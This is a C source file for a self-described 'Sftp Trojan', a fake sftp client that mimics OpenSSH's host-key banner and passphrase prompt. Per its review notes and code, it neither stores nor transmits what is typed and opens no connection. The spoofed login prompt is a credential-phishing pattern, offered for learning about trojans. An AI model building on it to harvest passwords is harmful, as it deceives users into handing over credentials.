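/*
 * Sftp Trojan
 * by Javantea aka. Joel R. Voss
 * Feb 27, 2006
 *
 * This program is written for the purpose of learning about trojans and to
 * replicate the useful sftp interface for udp_sess1.
 *
 * Review notes (what this file actually does, for anyone triaging it):
 *  - No socket is opened anywhere in this file; the hostname from argv[1]
 *    is only echoed back in the prompts.
 *  - The "RSA key fingerprint" is the hex of a constant 16-byte string and
 *    the host address is always "::1", so the banner is identical for every
 *    host. The key path in the passphrase prompt is hard-coded as well.
 *  - Whatever is typed at the passphrase prompt is only length-checked
 *    (check_password); this file does not store or transmit it.
 *  - Every command handler except help, progress and version is an empty
 *    stub, so commands such as ls or get print nothing.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

/*
 * Print `length` bytes of `data` as colon-separated two-digit hex.
 * Prints nothing when data is NULL or length is not positive.
 */
void print_hex(char *data, int length)
{
    if (data == NULL || length <= 0) {
        return;
    }

    for (int i = 0; i < length; i++) {
        /*
         * Go through unsigned char: a plain char with the high bit set
         * would be sign-extended and printed as "ffffffXX" by %02x.
         */
        printf(i == 0 ? "%02x" : ":%02x", (unsigned int)(unsigned char)data[i]);
    }
}

/* Print the command-line synopsis shown when no host argument is given. */
void usage(void)
{
    printf("usage: sftp [-1Cv] [-B buffer_size] [-b batchfile] [-F ssh_config]\n"
           "            [-o ssh_option] [-P sftp_server_path] [-R num_requests]\n"
           "            [-S program] [-s subsystem | sftp_server] host\n"
           "       sftp [[user@]host[:file [file]]]\n"
           "       sftp [[user@]host[:dir[/]]]\n"
           "       sftp -b batchfile [user@]host\n");
}

/* Print the static command list for the "help" and "?" commands. */
void sftp_help(void)
{
    printf("Available commands:\n"
           "cd path                       Change remote directory to 'path'\n"
           "lcd path                      Change local directory to 'path'\n"
           "chgrp grp path                Change group of file 'path' to 'grp'\n"
           "chmod mode path               Change permissions of file 'path' to 'mode'\n"
           "chown own path                Change owner of file 'path' to 'own'\n"
           "help                          Display this help text\n"
           "get remote-path [local-path]  Download file\n"
           "lls [ls-options [path]]       Display local directory listing\n"
           "ln oldpath newpath            Symlink remote file\n"
           "lmkdir path                   Create local directory\n"
           "lpwd                          Print local working directory\n"
           "ls [path]                     Display remote directory listing\n"
           "lumask umask                  Set local umask to 'umask'\n"
           "mkdir path                    Create remote directory\n"
           "progress                      Toggle display of progress meter\n"
           "put local-path [remote-path]  Upload file\n"
           "pwd                           Display remote working directory\n"
           "exit                          Quit sftp\n"
           "quit                          Quit sftp\n"
           "rename oldpath newpath        Rename remote file\n"
           "rmdir path                    Remove remote directory\n"
           "rm path                       Delete remote file\n"
           "symlink oldpath newpath       Symlink remote file\n"
           "version                       Show SFTP version\n"
           "!command                      Execute 'command' in local shell\n"
           "!                             Escape to local shell\n"
           "?                             Synonym for help\n");
}

/*
 * Command handlers. Each receives the raw command line and the size of the
 * buffer holding it. All but sftp_progress and sftp_version are empty
 * placeholders that ignore their arguments.
 */
void sftp_ls(char *arg, int length) { (void)arg; (void)length; }

void sftp_cd(char *arg, int length) { (void)arg; (void)length; }

void sftp_lcd(char *arg, int length) { (void)arg; (void)length; }

void sftp_chmod(char *arg, int length) { (void)arg; (void)length; }

void sftp_chgrp(char *arg, int length) { (void)arg; (void)length; }

void sftp_get(char *arg, int length) { (void)arg; (void)length; }

void sftp_put(char *arg, int length) { (void)arg; (void)length; }

void sftp_lls(char *arg, int length)
{
    // TODO: Local ls should be pretty easy to fake. fork ls maybe?
    (void)arg;
    (void)length;
}

void sftp_lumask(char *arg, int length) { (void)arg; (void)length; }

void sftp_ln(char *arg, int length) { (void)arg; (void)length; }

/* Always reports the meter as disabled; no state is toggled. */
void sftp_progress(char *arg, int length)
{
    // TODO: enable also.
    (void)arg;
    (void)length;
    printf("Progress meter disabled\n");
}

void sftp_pwd(char *arg, int length) { (void)arg; (void)length; }

void sftp_rename(char *arg, int length) { (void)arg; (void)length; }

void sftp_rmdir(char *arg, int length) { (void)arg; (void)length; }

void sftp_rm(char *arg, int length) { (void)arg; (void)length; }

void sftp_symlink(char *arg, int length) { (void)arg; (void)length; }

/* Prints a fixed protocol version string. */
void sftp_version(char *arg, int length)
{
    (void)arg;
    (void)length;
    printf("SFTP protocol version 3\n");
}

void sftp_bang(char *arg, int length) { (void)arg; (void)length; }

void sftp_mkdir(char *arg, int length) { (void)arg; (void)length; }

/*
 * Read one line from stdin into `password` (at most length - 1 characters,
 * trailing newline included) with terminal echo switched off.
 *
 * On EOF or read error the buffer is left as an empty string, so callers
 * never inspect stale or uninitialized bytes. Echo is only touched when
 * stdin is a terminal whose settings could be read; the saved settings are
 * restored before returning.
 */
void get_password(char *password, int length)
{
    struct termios termios_old;
    struct termios termios_noecho;
    int have_tty;

    if (password == NULL || length <= 0) {
        return;
    }
    password[0] = '\0';

    /*
     * tcgetattr() fails when stdin is a pipe or file. In that case
     * termios_old is indeterminate and must not be handed to tcsetattr().
     */
    have_tty = (tcgetattr(STDIN_FILENO, &termios_old) == 0);
    if (have_tty) {
        termios_noecho = termios_old;
        termios_noecho.c_lflag &= ~ECHO;
        tcsetattr(STDIN_FILENO, TCSANOW, &termios_noecho);
    }

    if (fgets(password, length, stdin) == NULL) {
        password[0] = '\0';
    }

    if (have_tty) {
        tcsetattr(STDIN_FILENO, TCSANOW, &termios_old);
    }
}

/*
 * Return 1 when the string in `password` is longer than six characters,
 * 0 otherwise. `length` is the size of the buffer in bytes.
 *
 * The buffer is force-terminated at its last valid index (length - 1).
 * Writing the terminator at password[length], as this function previously
 * did, lands one byte past the end of a `length`-byte buffer.
 */
int check_password(char *password, int length)
{
    if (password == NULL || length <= 0) {
        return 0;
    }

    password[length - 1] = '\0';
    return strlen(password) > 6 ? 1 : 0;
}

/* Print a canned connection-reset message and return 1. Not called in this file. */
int rand_err1(void)
{
    printf("Read from socket failed: Connection reset by peer\n");
    return 1;
}

/*
 * Entry point: print the host-key and passphrase prompts, then run the
 * command loop until quit/exit or end of input.
 *
 * Returns 1 when no host argument is given, when the host-key prompt is not
 * answered with "yes", or when stdin ends during the prompts; 0 otherwise.
 */
int main(int argc, char **argv)
{
    int ret = 0;

    if (argc < 2) {
        usage();
        return 1;
    }

    /*
     * getenv() returns NULL when USER is unset, and strncpy() leaves the
     * destination unterminated when the value fills it. snprintf() with a
     * fallback avoids both.
     */
    char user[256];
    const char *env_user = getenv("USER");
    snprintf(user, sizeof user, "%s", env_user != NULL ? env_user : "");

    char *hostname = argv[1];
    char host_addr[] = "::1";
    char fingerprint[] = "AAAAbbbbCCCCdddd";

    printf("Connecting to %s...\n", hostname);
    usleep(300);

    int authenticity = 0;
    if (authenticity == 0) {
        printf("The authenticity of host '%s(%s)' can't be established.\n", hostname, host_addr);
        printf("RSA key fingerprint is ");
        print_hex(fingerprint, 16);
        //06:4b:ca:5c:57:6a:7a:3c:d5:3b:dd:39:fb:b2:0e:da.;
        printf("\n");
        printf("Are you sure you want to continue connecting (yes/no)? ");

        char yes[5];
        /* A failed read leaves `yes` uninitialized; treat it as a refusal. */
        if (fgets(yes, sizeof yes, stdin) == NULL) {
            return 1;
        }
        if (strncmp(yes, "yes", 3) == 0) {
            printf("Warning: Permanently added '%s' (RSA) to the list of known hosts.\n", hostname);
        } else {
            return 1;
        }
    }

    char buf[256];
    int dsa = 1;
    while (1) {
        if (dsa == 1) {
            printf("Enter passphrase for key '/home/jvoss/.ssh/id_dsa': ");
            get_password(buf, (int)sizeof buf);
        } else {
            printf("%s@%s's password: ", user, hostname);
            get_password(buf, (int)sizeof buf);
        }

        // They gave up, so will we.
        /* ferror() is checked too so a persistent read error cannot spin here. */
        if (feof(stdin) || ferror(stdin)) {
            printf("\n");
            return 1;
        }
        printf("\n");

        if (check_password(buf, (int)sizeof buf) == 0) {
            printf("Permission denied, please try again.\n");
        } else {
            break;
        }
    }

    while (!feof(stdin)) {
        printf("sftp> ");
        /*
         * Stop on a failed read. Otherwise `buf` would still hold the
         * previous line (or the passphrase) and be dispatched again.
         */
        if (fgets(buf, (int)sizeof buf, stdin) == NULL) {
            break;
        }

        if (strncmp(buf, "help", 4) == 0 || strncmp(buf, "?", 1) == 0) {
            sftp_help();
        } else if (strncmp(buf, "cd", 2) == 0) {
            sftp_cd(buf, 256);
        } else if (strncmp(buf, "lcd", 3) == 0) {
            sftp_lcd(buf, 256);
        } else if (strncmp(buf, "chmod", 5) == 0) {
            sftp_chmod(buf, 256);
        } else if (strncmp(buf, "chgrp", 5) == 0) {
            sftp_chgrp(buf, 256);
        } else if (strncmp(buf, "get", 3) == 0) {
            sftp_get(buf, 256);
        } else if (strncmp(buf, "put", 3) == 0) {
            sftp_put(buf, 256);
        } else if (strncmp(buf, "ls", 2) == 0) {
            sftp_ls(buf, 256);
        } else if (strncmp(buf, "lls", 3) == 0) {
            sftp_lls(buf, 256);
        } else if (strncmp(buf, "lumask", 6) == 0) {
            sftp_lumask(buf, 256);
        } else if (strncmp(buf, "ln", 2) == 0) {
            sftp_ln(buf, 256);
        } else if (strncmp(buf, "progress", 8) == 0) {
            sftp_progress(buf, 256);
        } else if (strncmp(buf, "pwd", 3) == 0) {
            sftp_pwd(buf, 256);
        } else if (strncmp(buf, "rename", 6) == 0) {
            sftp_rename(buf, 256);
        } else if (strncmp(buf, "rmdir", 5) == 0) {
            sftp_rmdir(buf, 256);
        } else if (strncmp(buf, "rm", 2) == 0) {
            sftp_rm(buf, 256);
        } else if (strncmp(buf, "symlink", 7) == 0) {
            sftp_symlink(buf, 256);
        } else if (strncmp(buf, "version", 7) == 0) {
            sftp_version(buf, 256);
        } else if (strncmp(buf, "!", 1) == 0) {
            sftp_bang(buf, 256);
        } else if (strncmp(buf, "dir", 3) == 0) {
            sftp_ls(buf, 256);
        } else if (strncmp(buf, "mkdir", 5) == 0) {
            sftp_mkdir(buf, 256);
        } else if (strncmp(buf, "quit", 4) == 0 || strncmp(buf, "exit", 4) == 0) {
            break;
        } else {
            printf("Invalid command.\n");
        }
    }

    // Put the command prompt on the next line.
    if (feof(stdin)) {
        printf("\n");
    }
    return ret;
}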